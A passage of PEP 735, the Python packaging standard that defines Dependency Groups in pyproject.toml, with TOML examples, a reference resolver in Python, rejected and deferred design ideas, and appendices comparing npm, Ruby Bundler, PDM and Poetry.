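            out.extend(expand(item["include-group"]))
        else:                       # a plain dependency specifier
            out.append(item)
    return out

assert expand("bar") == ["c", "a", "b", "d"]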

+

Dependency Group Includes may specify the same package multiple times. Tools +SHOULD NOT deduplicate or otherwise alter the list contents produced by the +include. For example, given the following table:

+
[dependency-groups]
+group-a = ["foo"]
+group-b = ["foo>1.0"]
+group-c = ["foo<1.0"]
+all = ["foo", {include-group = "group-a"}, {include-group = "group-b"}, {include-group = "group-c"}]
+
+
+

The resolved value of all SHOULD be ["foo", "foo", "foo>1.0", "foo<1.0"]. +Tools should handle such a list exactly as they would handle any other case in +which they are asked to process the same requirement multiple times with +different version constraints.

+

An included group may itself contain Dependency Group Includes, in which case those includes should be expanded as well. Dependency Group Includes MUST NOT include cycles, and tools SHOULD report an error if they detect a cycle.

+
+
+
+

Example Dependency Groups Table

+

The following is an example of a partial pyproject.toml which uses this to +define four Dependency Groups: test, docs, typing, and +typing-test:

+
[dependency-groups]
+test = ["pytest", "coverage"]
+docs = ["sphinx", "sphinx-rtd-theme"]
+typing = ["mypy", "types-requests"]
+typing-test = [{include-group = "typing"}, {include-group = "test"}, "useful-types"]
+
+
+

Note that none of these Dependency Group declarations implicitly install the +current package, its dependencies, or any optional dependencies. +Use of a Dependency Group like test to test a package requires that the +user’s configuration or toolchain also installs the current package (.). +For example,

+
$TOOL install-dependency-group test
+pip install -e .
+
+
+

could be used (supposing $TOOL is a tool which supports installing +Dependency Groups) to build a testing environment.

+

This also allows for the docs dependency group to be used without +installing the project as a package:

+
$TOOL install-dependency-group docs
+
+
+
+
+

Package Building

+

Build backends MUST NOT include Dependency Group data in built distributions as package metadata. This means that PKG-INFO in sdists and METADATA in wheels do not include any referenceable fields containing Dependency Groups.

+

It is valid to use Dependency Groups in the evaluation of dynamic metadata, and +pyproject.toml files included in sdists will naturally still contain the +[dependency-groups] table. However, the table contents are not part of a +published package’s interfaces.

+
+
+

Installing Dependency Groups

+

Tools which support Dependency Groups are expected to provide new options and +interfaces to allow users to install from Dependency Groups.

+

No syntax is defined for expressing the Dependency Group of a package, for two +reasons:

+
    +
  • it would not be valid to refer to the Dependency Groups of a third-party +package from PyPI (because the data is defined to be unpublished)
  • +
  • there is not guaranteed to be a current package for Dependency Groups – part +of their purpose is to support non-package projects
  • +
+

For example, a possible pip interface for installing Dependency Groups +would be:

+
pip install --dependency-groups=test,typing
+
+
+

Note that this is only an example. This PEP does not declare any requirements +for how tools support the installation of Dependency Groups.

+
+

Overlapping Install UX with Extras

+

Tools MAY choose to provide the same interfaces for installing Dependency +Groups as they do for installing extras.

+

Note that this specification does not forbid having an extra whose name matches +a Dependency Group.

+

Users are advised to avoid creating Dependency Groups whose names match extras. +Tools MAY treat such matching as an error.

+
+
+
+

Validation and Compatibility

+

Tools supporting Dependency Groups may want to validate data before using it. +However, tools implementing such validation behavior should be careful to allow +for future expansions to this spec, so that they do not unnecessarily emit +errors or warnings in the presence of new syntax.

+

Tools SHOULD error when evaluating or processing unrecognized data in +Dependency Groups.

+

Tools SHOULD NOT eagerly validate the list contents of all Dependency +Groups.

+

This means that in the presence of the following data, most tools will allow +the foo group to be used, and will only error when the bar group is +used:

+
[dependency-groups]
+foo = ["pyparsing"]
+bar = [{set-phasers-to = "stun"}]
+
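With the reference implementation later in this document, that behavior falls out naturally, since only the requested group's list is examined (a sketch):

groups = {
    "foo": ["pyparsing"],
    "bar": [{"set-phasers-to": "stun"}],
}
resolve(groups, "foo")  # -> ["pyparsing"]
resolve(groups, "bar")  # raises ValueError: Invalid dependency group item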
+
+
+

Linters and Validators may be stricter

+

Eager validation is discouraged for tools which primarily install or resolve +Dependency Groups. +Linters and validation tools may have good cause to ignore this recommendation.

+
+
+
+
+

Reference Implementation

+

The following Reference Implementation prints the contents of a Dependency +Group to stdout, newline delimited. +The output is therefore valid requirements.txt data.

+
import re
+import sys
+import tomllib
+from collections import defaultdict
+
+from packaging.requirements import Requirement
+
+
+def _normalize_name(name: str) -> str:
+    return re.sub(r"[-_.]+", "-", name).lower()
+
+
+def _normalize_group_names(dependency_groups: dict) -> dict:
+    original_names = defaultdict(list)
+    normalized_groups = {}
+
+    for group_name, value in dependency_groups.items():
+        normed_group_name = _normalize_name(group_name)
+        original_names[normed_group_name].append(group_name)
+        normalized_groups[normed_group_name] = value
+
+    errors = []
+    for normed_name, names in original_names.items():
+        if len(names) > 1:
+            errors.append(f"{normed_name} ({', '.join(names)})")
+    if errors:
+        raise ValueError(f"Duplicate dependency group names: {', '.join(errors)}")
+
+    return normalized_groups
+
+
+def _resolve_dependency_group(
+    dependency_groups: dict, group: str, past_groups: tuple[str, ...] = ()
+) -> list[str]:
+    if group in past_groups:
+        raise ValueError(f"Cyclic dependency group include: {group} -> {past_groups}")
+
+    if group not in dependency_groups:
+        raise LookupError(f"Dependency group '{group}' not found")
+
+    raw_group = dependency_groups[group]
+    if not isinstance(raw_group, list):
+        raise ValueError(f"Dependency group '{group}' is not a list")
+
+    realized_group = []
+    for item in raw_group:
+        if isinstance(item, str):
+            # packaging.requirements.Requirement parsing ensures that this is a valid
+            # PEP 508 Dependency Specifier
+            # raises InvalidRequirement on failure
+            Requirement(item)
+            realized_group.append(item)
+        elif isinstance(item, dict):
+            if tuple(item.keys()) != ("include-group",):
+                raise ValueError(f"Invalid dependency group item: {item}")
+
+            include_group = _normalize_name(next(iter(item.values())))
+            realized_group.extend(
+                _resolve_dependency_group(
+                    dependency_groups, include_group, past_groups + (group,)
+                )
+            )
+        else:
+            raise ValueError(f"Invalid dependency group item: {item}")
+
+    return realized_group
+
+
+def resolve(dependency_groups: dict, group: str) -> list[str]:
+    if not isinstance(dependency_groups, dict):
+        raise TypeError("Dependency Groups table is not a dict")
+    if not isinstance(group, str):
+        raise TypeError("Dependency group name is not a str")
+    return _resolve_dependency_group(dependency_groups, group)
+
+
+if __name__ == "__main__":
+    with open("pyproject.toml", "rb") as fp:
+        pyproject = tomllib.load(fp)
+
+    dependency_groups_raw = pyproject["dependency-groups"]
+    dependency_groups = _normalize_group_names(dependency_groups_raw)
+    print("\n".join(resolve(dependency_groups, sys.argv[1])))
+
+
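For illustration, resolving the typing-test group from the Example Dependency Groups Table above would proceed as follows (a sketch using the functions defined in the implementation, with the data inlined rather than read from pyproject.toml):

example = {
    "test": ["pytest", "coverage"],
    "docs": ["sphinx", "sphinx-rtd-theme"],
    "typing": ["mypy", "types-requests"],
    "typing-test": [{"include-group": "typing"}, {"include-group": "test"}, "useful-types"],
}
print("\n".join(resolve(_normalize_group_names(example), "typing-test")))
# mypy
# types-requests
# pytest
# coverage
# useful-types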
+
+
+

Backwards Compatibility

+

At time of writing, the dependency-groups namespace within a +pyproject.toml file is unused. Since the top-level namespace is +reserved for use only by standards specified at packaging.python.org, +there are no direct backwards compatibility concerns.

+

However, the introduction of the feature has implications for a +number of ecosystem tools, especially those which attempt to support +examination of data in setup.py and requirements.txt.

+
+

Audit and Update Tools

+

A wide range of tools understand Python dependency data as expressed in requirements.txt files (e.g., Dependabot, Tidelift).

+

Such tools inspect dependency data and, in some cases, offer tool-assisted or fully automated updates. It is our expectation that no such tools would support the new Dependency Groups at first, and that broad ecosystem support could take many months, or even years, to arrive.

+

As a result, users of Dependency Groups would experience a degradation in their +workflows and tool support at the time that they start using Dependency Groups. +This is true of any new standard for where and how dependency data are encoded.

+
+
+
+

Security Implications

+

This PEP introduces new syntaxes and data formats for specifying dependency +information in projects. However, it does not introduce newly specified +mechanisms for handling or resolving dependencies.

+

It therefore does not carry security concerns other than those inherent in any +tools which may already be used to install dependencies – i.e. malicious +dependencies may be specified here, just as they may be specified in +requirements.txt files.

+
+
+

How to Teach This

+

This feature should be referred to by its canonical name, “Dependency Groups”.

+

The basic form of usage should be taught as a variant on typical +requirements.txt data. Standard dependency specifiers (PEP 508) can be +added to a named list. Rather than asking pip to install from a +requirements.txt file, either pip or a relevant workflow tool will install +from a named Dependency Group.

+

For new Python users, they may be taught directly to create a section in +pyproject.toml containing their Dependency Groups, similarly to how they +are currently taught to use requirements.txt files. +This also allows new Python users to learn about pyproject.toml files +without needing to learn about package building. +A pyproject.toml file with only [dependency-groups] and no other tables +is valid.

+

For both new and experienced users, the Dependency Group Includes will need to +be explained. For users with experience using requirements.txt, this can be +described as an analogue for -r. For new users, they should be taught that +an include allows one Dependency Group to extend another. Similar configuration +interfaces and the Python list.extend method may be used to explain the +idea by analogy.

+

Python users who have used setup.py packaging may be familiar with common +practices which predate pyproject.toml, in which package metadata is +defined dynamically. Requirements loaded from requirements.txt files and +definitions of static lists prior to setup() invocation readily analogize +with Dependency Groups.

+
+

Interfaces for Use of Dependency Groups

+

This specification provides no universal interface for interacting with Dependency Groups, other than the data format itself. This has implications both for tool authors and for users.

+

Tool authors should determine how or if Dependency Groups are relevant to their +user stories, and build their own interfaces to fit. +For environment managers, resolvers, installers, and related non-build tools, +they will be able to document that they support “PEP 735 Dependency Groups”, +but they will be responsible for documenting their usage modes. +For build backends, supporting Dependency Groups will require support for +inclusion from the project table, but set no other strict requirements.

+

For users, the primary consequence is that they must consult relevant tool +documentation whenever they wish to use Dependency Groups outside of package +builds. +Users should be advised by tools, either through documentation or runtime +warnings or errors, about usages which are disrecommended or not supported. +For example, if a tool wishes to require that all Dependency Groups are +mutually compatible, containing no contradictory package specifiers, it +should document that restriction and advise users on how to appropriately +leverage Dependency Groups for its purposes.

+
+
+
+

Rejected Ideas

+
+

Why not define each Dependency Group as a table?

+

If our goal is to allow for future expansion, then defining each Dependency +Group as a subtable, thus enabling us to attach future keys to each group, +allows for the greatest future flexibility.

+

However, it also makes the structure nested more deeply, and therefore harder +to teach and learn. One of the goals of this PEP is to be an easy replacement +for many requirements.txt use-cases.

+
+
+

Why not define a special string syntax to extend Dependency Specifiers?

+

Earlier drafts of this specification defined syntactic forms for Dependency +Group Includes and Path Dependencies.

+

However, there were two major issues with this approach:

+
    +
  • it complicates the string syntax which must be taught, beyond PEP 508
  • +
  • the resulting strings would always need to be disambiguated from PEP 508 +specifiers, complicating implementations
  • +
+
+
+

Why not allow for more non-PEP 508 dependency specifiers?

+

Several use cases surfaced during discussion which need more expressive +specifiers than are possible with PEP 508.

+

“Path Dependencies”, referring to local paths, and references to +[project.dependencies] were of particular interest.

+

However, there are no existing standards for these features (excepting the +de-facto standard of pip’s implementation details).

+

As a result, attempting to include these features in this PEP results in a +significant growth in scope, to attempt to standardize these various features +and pip behaviors.

+

Special attention was devoted to attempting to standardize the expression of editable installations, as expressed by pip install -e and PEP 660. However, although the creation of editable installs is standardized for build backends, the behavior of editables is not standardized for installers. Inclusion of editables in this PEP would require that any supporting tool allow for the installation of editables.

+

Therefore, although Poetry and PDM provide syntaxes for some of these features, +they are considered insufficiently standardized at present for inclusion in +Dependency Groups.

+
+
+

Why is the table not named [run], [project.dependency-groups], …?

+

There are many possible names for this concept. +It will have to live alongside the already existing [project.dependencies] +and [project.optional-dependencies] tables, and possibly a new +[external] dependency table as well (at time of writing, PEP 725, which +defines the [external] table, is in progress).

+

[run] was a leading proposal in earlier discussions, but its proposed usage +centered around a single set of runtime dependencies. This PEP explicitly +outlines multiple groups of dependencies, which makes [run] a less +appropriate fit – this is not just dependency data for a specific runtime +context, but for multiple contexts.

+

[project.dependency-groups] would offer a nice parallel with +[project.dependencies] and [project.optional-dependencies], but has +major downsides for non-package projects. +[project] requires several keys to be defined, such as name and +version. Using this name would either require redefining the [project] +table to allow for these keys to be absent, or else would impose a requirement +on non-package projects to define and use these keys. By extension, it would +effectively require any non-package project allow itself to be treated as a +package.

+
+
+

Why is pip’s planned implementation of --only-deps not sufficient?

+

pip currently has a feature on the roadmap to add an --only-deps flag. This flag is intended to allow users to install package dependencies and extras without installing the current package.

+

It does not address the needs of non-package projects, nor does it allow for +the installation of an extra without the package dependencies.

+
+
+

Why isn’t <environment manager> a solution?

+

Existing environment managers like tox, Nox, and Hatch already have +the ability to list inlined dependencies as part of their configuration data. +This meets many development dependency needs, and clearly associates dependency +groups with relevant tasks which can be run. +These mechanisms are good but they are not sufficient.

+

First, they do not address the needs of non-package projects.

+

Second, there is no standard for other tools to use to access these data. This +has impacts on high-level tools like IDEs and Dependabot, which cannot support +deep integration with these Dependency Groups. (For example, at time of writing +Dependabot will not flag dependencies which are pinned in tox.ini files.)

+
+
+
+

Deferred Ideas

+
+

Why not support Dependency Group Includes in [project.dependencies] or [project.optional-dependencies]?

+

Earlier drafts of this specification allowed Dependency Group Includes to be +used in the [project] table. +However, there were several issues raised during community feedback which led +to its removal.

+

Only a small number of additional use cases would be addressed by the inclusion +of Dependency Groups, and it increased the scope of the specification +significantly. In particular, this inclusion would increase the number of parties +impacted by the addition. Many readers of the [project] table, including build +backends, SBOM generators, and dependency analyzers are implicated by a change to +[project] but may continue to operate as-is in the presence of a new (but +unconnected) [dependency-groups] table.

+

Separately from the above concern, allowing inclusion of dependency groups from the +[project] table encourages package maintainers to move dependency metadata out +of the current standard location. +This complicates static pyproject.toml metadata and conflicts with the goal of +PEP 621 to store dependency metadata in a single location.

+

Finally, exclusion of [project] support from this PEP is not final. The +use of includes from that table, or an inclusion syntax from +[dependency-groups] into [project], could be introduced by a future +PEP and considered on its own merits.

+
+

Use Cases for Dependency Group Includes From [project]

+

Although deferred in this PEP, allowing includes from the [project] +table would address several use cases.

+

In particular, there are cases in which package developers would like to +install only the dependencies of a package, without the package itself.

+

For example:

+
    +
  • Specify different environment variables or options when building dependencies +vs when building the package itself
  • +
  • Creating layered container images in which the dependencies are isolated from +the package being installed
  • +
  • Providing the dependencies to analysis environments (e.g., type checking) +without having to build and install the package itself
  • +
+

For an example of the last case, consider the following sample +pyproject.toml:

+
[project]
+dependencies = [{include-group = "runtime"}]
+[project.optional-dependencies]
+foo = [{include-group = "foo"}]
+[dependency-groups]
+runtime = ["a", "b"]
+foo = ["c", "d"]
+typing = ["mypy", {include-group = "runtime"}, {include-group = "foo"}]
+
+
+

In this case, a typing group can be defined, with all of the package’s +runtime dependencies, but without the package itself. This allows uses of the +typing Dependency Group to skip installation of the package – not only is +this more efficient, but it may reduce the requirements for testing systems.

+
+
+
+

Why not support Dependency Group Includes in [build-system.requires]?

+

Given that we will not allow for [project] usage of Dependency Groups, +[build-system.requires] can be considered in comparison with +[project.dependencies].

+

There are fewer theoretical usages for build requirements specified in a group than for package requirements. Additionally, the impact of such a change implicates PEP 517 frontends, which would need to support Dependency Groups in order to prepare a build environment.

+

Compared with changes to [project.dependencies] and +[project.optional-dependencies], changing the behaviors of +[build-system.requires] is higher impact and has fewer potential uses. +Therefore, given that this PEP declines to make changes to the [project] +table, changing [build-system] is also deferred.

+
+
+

Why not support a Dependency Group which includes the current project?

+

Several usage scenarios for dependency groups revolve around installing a +dependency group alongside a package defined in the [project] table. +For example, testing a package involves installing testing dependencies and the +package itself. Additionally, the compatibility of a dependency group with the +main package is a valuable input to lockfile generators.

+

In such cases, it is desirable for a Dependency Group to declare that it +depends upon the project itself. Example syntaxes from discussions included +{include-project = true} and {include-group = ":project:"}.

+

However, if a specification is established to extend PEP 508 with Path +Dependencies, this would result in Dependency Groups having two ways of +specifying the main package. For example, if . becomes formally supported, +and {include-project = true} is included in this PEP, then dependency +groups may specify any of the following groups

+
[dependency-groups]
+case1 = [{include-project = true}]
+case2 = ["."]
+case3 = [{include-project = true}, "."]
+case4 = [{include-project = false}, "."]
+
+
+

In order to avoid a confusing future in which multiple different options +specify the package defined in pyproject.toml, any syntax for declaring +this relationship is omitted from this PEP.

+
+
+
+

Appendix A: Prior Art in Non-Python Languages

+

This section is primarily informational and serves to document how other +language ecosystems solve similar problems.

+
+

JavaScript and package.json

+

In the JavaScript community, packages contain a canonical configuration and +data file, similar in scope to pyproject.toml, at package.json.

+

Two keys in package.json control dependency data: "dependencies" and +"devDependencies". The role of "dependencies" is effectively the same +as that of [project.dependencies] in pyproject.toml, declaring the +direct dependencies of a package.

+
+

"dependencies" data

+

Dependency data is declared in package.json as a mapping from package names +to version specifiers.

+

Version specifiers support a small grammar of possible versions, ranges, and +other values, similar to Python’s PEP 440 version specifiers.

+

For example, here is a partial package.json file declaring a few +dependencies:

+
{
+    "dependencies": {
+        "@angular/compiler": "^17.0.2",
+        "camelcase": "8.0.0",
+        "diff": ">=5.1.0 <6.0.0"
+    }
+}
+
+
+

The @ symbol introduces a scope, which declares the package owner for organizationally owned packages. "@angular/compiler" therefore declares a package named compiler grouped under angular ownership.

+
+
+

Dependencies Referencing URLs and Local Paths

+

Dependency specifiers support a syntax for URLs and Git repositories, similar +to the provisions in Python packaging.

+

URLs may be used in lieu of version numbers. +When used, they implicitly refer to tarballs of package source code.

+

Git repositories may be similarly used, including support for committish +specifiers.

+

Unlike PEP 440, NPM allows for the use of local paths to package source code +directories for dependencies. When these data are added to package.json via +the standard npm install --save command, the path is normalized to a +relative path, from the directory containing package.json, and prefixed +with file:. For example, the following partial package.json contains a +reference to a sibling of the current directory:

+
{
+    "dependencies": {
+        "my-package": "file:../foo"
+    }
+}
+
+
+

The official NPM documentation +states that local path dependencies “should not” be published to public package +repositories, but makes no statement about the inherent validity or invalidity +of such dependency data in published packages.

+
+
+

"devDependencies" data

+

package.json is permitted to contain a second section named +"devDependencies", in the same format as "dependencies". +The dependencies declared in "devDependencies" are not installed by default +when a package is installed from the package repository (e.g. as part of a +dependency being resolved) but are installed when npm install is run in the +source tree containing package.json.

+

Just as "dependencies" supports URLs and local paths, so does +"devDependencies".

+
+
+

"peerDependencies" and "optionalDependencies"

+

There are two additional, related sections in package.json which have +relevance.

+

"peerDependencies" declares a list of dependencies in the same format as +"dependencies", but with the meaning that these are a compatibility +declaration. +For example, the following data declares compatibility with package foo +version 2:

+
{
+    "peerDependencies": {
+        "foo": "2.x"
+    }
+}
+
+
+

"optionalDependencies" declares a list of dependencies which should be +installed if possible, but which should not be treated as failures if they are +unavailable. It also uses the same mapping format as "dependencies".

+
+
"peerDependenciesMeta"
+

"peerDependenciesMeta" is a section which allows for additional control +over how "peerDependencies" are treated.

+

Warnings about missing dependencies can be disabled by setting packages to +optional in this section, as in the following sample:

+
{
+    "peerDependencies": {
+        "foo": "2.x"
+    },
+    "peerDependenciesMeta": {
+        "foo": {
+            "optional": true
+        }
+    }
+}
+
+
+
+
+
+

--omit and --include

+

The npm install command supports two options, --omit and --include, +which can control whether “prod”, “dev”, “optional”, or “peer” dependencies are installed.

+

The “prod” name refers to dependencies listed under "dependencies".

+

By default, all four groups are installed when npm install is executed +against a source tree, but these options can be used to control installation +behavior more precisely. +Furthermore, these values can be declared in .npmrc files, allowing +per-user and per-project configurations to control installation behaviors.

+
+
+
+

Ruby & Ruby Gems

+

Ruby projects may or may not be intended to produce packages (“gems”) in the +Ruby ecosystem. In fact, the expectation is that most users of the language do +not want to produce gems and have no interest in producing their own packages. +Many tutorials do not touch on how to produce packages, and the toolchain never +requires user code to be packaged for supported use-cases.

+

Ruby splits requirement specification into two separate files.

+
    +
  • Gemfile: a dedicated file which only supports requirement data in the form +of dependency groups
  • +
  • <package>.gemspec: a dedicated file for declaring package (gem) metadata
  • +
+

The bundler tool, providing the bundle command, is the primary interface +for using Gemfile data.

+

The gem tool is responsible for building gems from .gemspec data, via the +gem build command.

+
+

Gemfiles & bundle

+

A Gemfile is a Ruby file +containing gem directives enclosed in any number of group declarations. +gem directives may also be used outside of the group declaration, in which +case they form an implicitly unnamed group of dependencies.

+

For example, the following Gemfile lists rails as a project dependency. +All other dependencies are listed under groups:

+
source 'https://rubygems.org'
+
+gem 'rails'
+
+group :test do
+  gem 'rspec'
+end
+
+group :lint do
+  gem 'rubocop'
+end
+
+group :docs do
+  gem 'kramdown'
+  gem 'nokogiri'
+end
+
+
+

If a user executes bundle install with these data, all groups are +installed. Users can deselect groups by creating or modifying a bundler config +in .bundle/config, either manually or via the CLI. For example, bundle +config set --local without 'lint:docs'.

+

It is not possible, with the above data, to exclude the top-level use of the +'rails' gem or to refer to that implicit grouping by name.

+
+
+

gemspec and packaged dependency data

+

A gemspec file is a +ruby file containing a Gem::Specification +instance declaration.

+

Only two fields in a Gem::Specification pertain to package dependency data. +These are add_development_dependency and add_runtime_dependency. +A Gem::Specification object also provides methods for adding dependencies +dynamically, including add_dependency (which adds a runtime dependency).

+

Here is a variant of the rails.gemspec file, with many fields removed or +shortened to simplify:

+
version = '7.1.2'
+
+Gem::Specification.new do |s|
+  s.platform    = Gem::Platform::RUBY
+  s.name        = "rails"
+  s.version     = version
+  s.summary     = "Full-stack web application framework."
+
+  s.license = "MIT"
+  s.author   = "David Heinemeier Hansson"
+
+  s.files = ["README.md", "MIT-LICENSE"]
+
+  # shortened from the real 'rails' project
+  s.add_dependency "activesupport", version
+  s.add_dependency "activerecord",  version
+  s.add_dependency "actionmailer",  version
+  s.add_dependency "activestorage", version
+  s.add_dependency "railties",      version
+end
+
+
+

Note that there is no use of add_development_dependency. +Some other mainstream, major packages (e.g. rubocop) do not use development +dependencies in their gems.

+

Other projects do use this feature. For example, kramdown makes use of +development dependencies, containing the following specification in its +Rakefile:

+
s.add_dependency "rexml"
+s.add_development_dependency 'minitest', '~> 5.0'
+s.add_development_dependency 'rouge', '~> 3.0', '>= 3.26.0'
+s.add_development_dependency 'stringex', '~> 1.5.1'
+
+
+

The purpose of development dependencies is only to declare an implicit group, +as part of the .gemspec, which can then be used by bundler.

+

For full details, see the gemspec directive in bundler's +documentation on Gemfiles. +However, the integration between .gemspec development dependencies and +Gemfile/bundle usage is best understood via an example.

+
+
gemspec development dependency example
+

Consider the following simple project in the form of a Gemfile and .gemspec. +The cool-gem.gemspec file:

+
Gem::Specification.new do |s|
+  s.author = 'Stephen Rosen'
+  s.name = 'cool-gem'
+  s.version = '0.0.1'
+  s.summary = 'A very cool gem that does cool stuff'
+  s.license = 'MIT'
+
+  s.files = []
+
+  s.add_dependency 'rails'
+  s.add_development_dependency 'kramdown'
+end
+
+
+

and the Gemfile:

+
source 'https://rubygems.org'
+
+gemspec
+
+
+

The gemspec directive in Gemfile declares a dependency on the local +package, cool-gem, defined in the locally available cool-gem.gemspec +file. It also implicitly adds all development dependencies to a dependency +group named development.

+

Therefore, in this case, the gemspec directive is equivalent to the +following Gemfile content:

+
gem 'cool-gem', :path => '.'
+
+group :development do
+  gem 'kramdown'
+end
+
+
+
+
+
+
+
+

Appendix B: Prior Art in Python

+

In the absence of any prior standard for Dependency Groups, two known workflow +tools, PDM and Poetry, have defined their own solutions.

+

This section will primarily focus on these two tools as cases of prior art +regarding the definition and use of Dependency Groups in Python.

+
+

Projects are Packages

+

Both PDM and Poetry treat the projects they support as packages. +This allows them to use and interact with standard pyproject.toml metadata +for some of their needs, and allows them to support installation of the +“current project” by doing a build and install using their build backends.

+

Effectively, this means that neither Poetry nor PDM supports non-package projects.

+
+
+

Non-Standard Dependency Specifiers

+

PDM and Poetry extend PEP 508 dependency specifiers with additional features +which are not part of any shared standard. +The two tools use slightly different approaches to these problems, however.

+

PDM supports specifying local paths, and editable installs, via a syntax which +looks like a set of arguments to pip install. For example, the following +dependency group includes a local package in editable mode:

+
[tool.pdm.dev-dependencies]
+mygroup = ["-e file:///${PROJECT_ROOT}/foo"]
+
+
+

This declares a dependency group mygroup which includes a local editable +install from the foo directory.

+

Poetry describes dependency groups as tables, mapping package names to +specifiers. For example, the same configuration as the above mygroup +example might appear as follows under Poetry:

+
[tool.poetry.group.mygroup]
+foo = { path = "foo", editable = true }
+
+
+

PDM restricts itself to a string syntax, and Poetry introduces tables which +describe dependencies.

+
+
+

Installing and Referring to Dependency Groups

+

Both PDM and Poetry have tool-specific support for installing dependency +groups. Because both projects support their own lockfile formats, they also +both have the capability to transparently use a dependency group name to refer +to the locked dependency data for that group.

+

However, neither tool’s dependency groups can be referenced natively from other +tools like tox, nox, or pip. +Attempting to install a dependency group under tox, for example, requires +an explicit call to PDM or Poetry to parse their dependency data and do the +relevant installation step.

+
+
+
+

Appendix C: Use Cases

+
+

Web Applications

+

A web application (e.g. a Django or Flask app) often does not need to build a +distribution, but bundles and ships its source to a deployment toolchain.

+

For example, a source code repository may define Python packaging metadata as +well as containerization or other build pipeline metadata (Dockerfile, +etc). +The Python application is built by copying the entire repository into a +build context, installing dependencies, and bundling the result as a machine +image or container.

+

Such applications have dependency groups for the build, but also for linting, +testing, etc. In practice, today, these applications often define themselves as +packages to be able to use packaging tools and mechanisms like extras to +manage their dependency groups. However, they are not conceptually packages, +meant for distribution in sdist or wheel format.

+

Dependency Groups allow these applications to define their various dependencies +without relying on packaging metadata, and without trying to express their +needs in packaging terms.

+
+
+

Libraries

+

Libraries are Python packages which build distributions (sdist and wheel) and +publish them to PyPI.

+

For libraries, Dependency Groups represent an alternative to extras for +defining groups of development dependencies, with the important advantages +noted above.

+

A library may define groups for test and typing which allow testing and +type-checking, and therefore rely on the library’s own dependencies (as +specified in [project.dependencies]).

+

Other development needs may not require installation of the package at all. For +example, a lint Dependency Group may be valid and faster to install without +the library, as it only installs tools like black, ruff, or flake8.

+

lint and test environments may also be valuable locations to hook in +IDE or editor support. See the case below for a fuller description of such +usage.

+

Here’s an example Dependency Groups table which might be suitable for a +library:

+
[dependency-groups]
+test = ["pytest<8", "coverage"]
+typing = ["mypy==1.7.1", "types-requests"]
+lint = ["black", "flake8"]
+typing-test = [{include-group = "typing"}, "pytest<8"]
+
+
+

Note that none of these implicitly install the library itself. +It is therefore the responsibility of any environment management toolchain to +install the appropriate Dependency Groups along with the library when needed, +as in the case of test.
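
+

For illustration only, here is a minimal sketch of how an environment management toolchain might discharge that responsibility, assuming the test group has already been resolved to a flat list of PEP 508 requirement strings (the helper name is hypothetical):

+
import subprocess, sys
+
+def install_group_with_library(requirements):
+    # Install the project itself (editable) plus the group's requirements.
+    # "requirements" is assumed to be a flat list of PEP 508 strings.
+    subprocess.run(
+        [sys.executable, "-m", "pip", "install", "-e", ".", *requirements],
+        check=True,
+    )
+
+install_group_with_library(["pytest<8", "coverage"])
+
+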

+
+
+

Data Science Projects

+

Data Science Projects typically take the form of a logical collection of +scripts and utilities for processing and analyzing data, using a common +toolchain. Components may be defined in the Jupyter Notebook format (ipynb), +but rely on the same common core set of utilities.

+

In such a project, there is no package to build or install. Therefore, +pyproject.toml currently does not offer any solution for dependency +management or declaration.

+

It is valuable for such a project to be able to define at least one major +grouping of dependencies. For example:

+
[dependency-groups]
+main = ["numpy", "pandas", "matplotlib"]
+
+
+

However, it may also be necessary for various scripts to have additional +supporting tools. Projects may even have conflicting or incompatible tools or +tool versions for different components, as they evolve over time.

+

Consider the following more elaborate configuration:

+
[dependency-groups]
+main = ["numpy", "pandas", "matplotlib"]
+scikit = [{include-group = "main"}, "scikit-learn==1.3.2"]
+scikit-old = [{include-group = "main"}, "scikit-learn==0.24.2"]
+
+
+

This defines scikit and scikit-old as two similar variants of the +common suite of dependencies, pulling in different versions of scikit-learn +to suit different scripts.

+

This PEP only defines these data. It does not formalize any mechanism for a +Data Science Project (or any other type of project) to install the dependencies +into known environments or associate those environments with the various +scripts. Such problems are left for tool authors to solve, and perhaps +eventually standardize.

+
+
+

Lockfile Generation

+

There are a number of tools which generate lockfiles in the Python ecosystem +today. PDM and Poetry each use their own lockfile formats, and pip-tools +generates requirements.txt files with version pins and hashes.

+

Dependency Groups are not an appropriate place to store lockfiles, as they lack +many of the necessary features. Most notably, they cannot store hashes, which +most lockfile users consider essential.

+

However, Dependency Groups are a valid input to tools which generate lockfiles. +Furthermore, PDM and Poetry both allow a Dependency Group name (under their +notions of Dependency Groups) to be used to refer to its locked variant.

+

Therefore, consider a tool which produces lockfiles, here called $TOOL. +It might be used as follows:

+
$TOOL lock --dependency-group=test
+$TOOL install --dependency-group=test --use-locked
+
+
+

All that such a tool needs to do is to ensure that its lockfile data records +the name test in order to support such usage.
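
+

As a purely hypothetical sketch (no lockfile schema is standardized by this PEP, and the field names below are invented for illustration), the recorded data might look like:

+
# Hypothetical lockfile data keyed by Dependency Group name; the schema
+# and field names are invented, and the hashes are elided placeholders.
+locked = {
+    "test": [
+        {"name": "pytest", "version": "7.4.4", "hash": "sha256:..."},
+        {"name": "coverage", "version": "7.4.0", "hash": "sha256:..."},
+    ],
+}
+
+def locked_requirements(group):
+    # A tool resolving "--dependency-group=test --use-locked" only needs
+    # to look the group name up in its recorded data.
+    return locked[group]
+
+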

+

The mutual compatibility of Dependency Groups is not guaranteed. For example, +the Data Science example above shows conflicting versions of scikit-learn. +Therefore, installing multiple locked dependency groups in tandem may require +that tools apply additional constraints or generate additional lockfile data. +These problems are considered out of scope for this PEP.

+

As two examples of how combinations might be locked:

+
    +
  • A tool might require that lockfile data be explicitly generated for any +combination to be considered valid
  • +
  • Poetry implements the requirement that all Dependency Groups be mutually +compatible, and generates only one locked version. (Meaning it finds a single +solution, rather than a set or matrix of solutions.)
  • +
+
+
+

Environment Manager Inputs

+

A common usage in tox, Nox, and Hatch is to install a set of dependencies into +a testing environment.

+

For example, under tox.ini, type checking dependencies may be defined +inline:

+
[testenv:typing]
+deps =
+    pyright
+    useful-types
+commands = pyright src/
+
+
+

This combination provides a desirable developer experience within a limited +context. Under the relevant environment manager, the dependencies which are +needed for the test environment are declared alongside the commands which need +those dependencies. They are not published in package metadata, as extras +would be, and they are discoverable for the tool which needs them to build the +relevant environment.

+

Dependency Groups apply to such usages by effectively “lifting” these +requirements data from a tool-specific location into a more broadly available +one. In the example above, only tox has access to the declared list of +dependencies. Under an implementation supporting dependency groups, the same +data might be available in a Dependency Group:

+
[dependency-groups]
+typing = ["pyright", "useful-types"]
+
+
+

The data can then be used under multiple tools. For example, tox might +implement support as dependency_groups = typing, replacing the deps +usage above.
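
+

As a sketch of what such processing could involve, assuming Python 3.11+ for tomllib, a tool might expand a group, including the proposed {include-group = "..."} references, roughly as follows (the function name is ours):

+
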